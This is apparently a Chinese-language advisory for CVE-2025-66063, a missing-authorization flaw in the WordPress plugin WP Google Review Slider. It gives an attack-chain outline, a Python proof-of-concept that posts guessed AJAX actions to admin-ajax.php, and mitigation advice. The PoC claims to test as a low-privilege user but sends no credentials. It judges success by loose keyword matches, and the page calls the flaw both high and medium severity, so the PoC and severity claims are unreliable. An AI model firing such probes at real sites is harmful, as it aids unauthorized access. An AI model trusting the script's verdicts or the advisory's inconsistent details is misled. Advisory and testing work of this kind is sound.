CVE-2025-66063 | WP Google Review Slider 缺失授权漏洞

漏洞信息

漏洞编号

CVE-2025-66063

漏洞类型

缺失授权

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

WP Google Review Slider (wp-google-places-review-slider)

漏洞概述

CVE-2025-66063是WordPress插件WP Google Review Slider中的一个高危安全漏洞，属于缺失授权（Missing Authorization）类型。该漏洞允许具有低权限的用户（如订阅者角色）执行本应需要更高权限才能进行的操作。攻击者可以利用此漏洞绕过正常的访问控制检查，访问或修改本应受保护的功能和数据。由于该插件用于在WordPress网站上展示Google评论，漏洞可能被利用来篡改评论显示内容或获取敏感配置信息。CVSS 3.1评分5.4，属于中等严重程度，但考虑到其利用门槛低且可在网络环境下远程利用，仍需及时修复。该漏洞影响17.4及以下所有版本。

技术细节

该漏洞源于WP Google Review Slider插件在处理用户请求时未能正确验证用户的权限级别。插件的多个AJAX端点或管理功能缺少wp_verify_nonce或current_user_can等权限检查函数。具体来说，当低权限用户（如订阅者）发送请求到插件的admin-ajax.php端点或直接访问某些管理路由时，服务器未能验证用户是否具有管理插件的权限。这允许攻击者通过构造特定请求，绕过前端访问控制，执行诸如导出评论数据、修改插件设置或访问Google API配置等敏感操作。攻击者只需注册一个低权限账户，即可利用此漏洞获取未授权的访问能力。由于CVSS向量显示攻击复杂度低且无需用户交互，漏洞利用相对简单。

攻击链分析

STEP 1

步骤1

攻击者在目标WordPress站点注册一个低权限账户（如订阅者角色）

STEP 2

步骤2

攻击者识别并探测WP Google Review Slider插件的AJAX端点或管理功能

STEP 3

步骤3

攻击者构造恶意请求，直接访问本应需要管理员权限才能操作的插件功能

STEP 4

步骤4

由于插件缺少权限验证，服务器错误地处理了该低权限请求

STEP 5

步骤5

攻击者获取敏感数据（Google API配置、评论数据等）或执行未授权操作

STEP 6

步骤6

攻击者利用获取的信息进行进一步攻击，如数据窃取或网站篡改

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-66063 PoC - Missing Authorization in WP Google Review Slider
# Target: WordPress site with vulnerable WP Google Review Slider plugin (<=17.4)

def check_vulnerability(target_url):
    """
    Check if the target WordPress site is vulnerable to CVE-2025-66063
    """
    # Add WordPress path if not present
    if not target_url.endswith('/'):
        target_url += '/'
    
    # Common WordPress AJAX endpoint
    ajax_url = target_url + 'wp-admin/admin-ajax.php'
    
    # Try to access plugin's admin functionality without proper authorization
    # This is a low-privilege user request that should fail but doesn't
    
    # Example: Get plugin settings or export reviews
    test_actions = [
        {'action': 'wpggr_get_reviews', 'data': 'export=1'},
        {'action': 'wp_google_review_slider_export', 'data': ''},
        {'action': 'ggr_admin_action', 'data': 'option=settings'}
    ]
    
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) PoC-Test',
        'Content-Type': 'application/x-www-form-urlencoded'
    }
    
    # Test as unauthenticated or low-privilege user
    for action_data in test_actions:
        try:
            response = requests.post(
                ajax_url,
                data=action_data,
                headers=headers,
                timeout=10,
                allow_redirects=False
            )
            
            # Check if response indicates successful unauthorized access
            if response.status_code == 200:
                # Check for sensitive data in response
                if any(keyword in response.text.lower() for keyword in 
                       ['google', 'api', 'key', 'token', 'review', 'setting', 'config']):
                    print(f"[+] VULNERABLE: Found unauthorized access to {action_data['action']}")
                    print(f"[+] Response contains sensitive plugin data")
                    return True
        except requests.RequestException as e:
            print(f"[-] Request error: {e}")
    
    print("[*] Target may not be vulnerable or plugin not installed")
    return False

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python cve-2025-66063_poc.py <target_url>")
        print("Example: python cve-2025-66063_poc.py http://example.com")
        sys.exit(1)
    
    target = sys.argv[1]
    print(f"[*] Testing {target} for CVE-2025-66063")
    check_vulnerability(target)

影响范围

WP Google Review Slider <= 17.4

防御指南

临时缓解措施

立即将WP Google Review Slider插件升级到开发者发布的最新修复版本。如果暂时无法升级，可通过Web应用防火墙（WAF）规则限制对插件AJAX端点的访问，同时审查并移除不必要的低权限用户账户。对于必须保持当前版本的情况，建议暂时禁用该插件或实施严格的访问控制策略，限制只有管理员才能访问相关功能。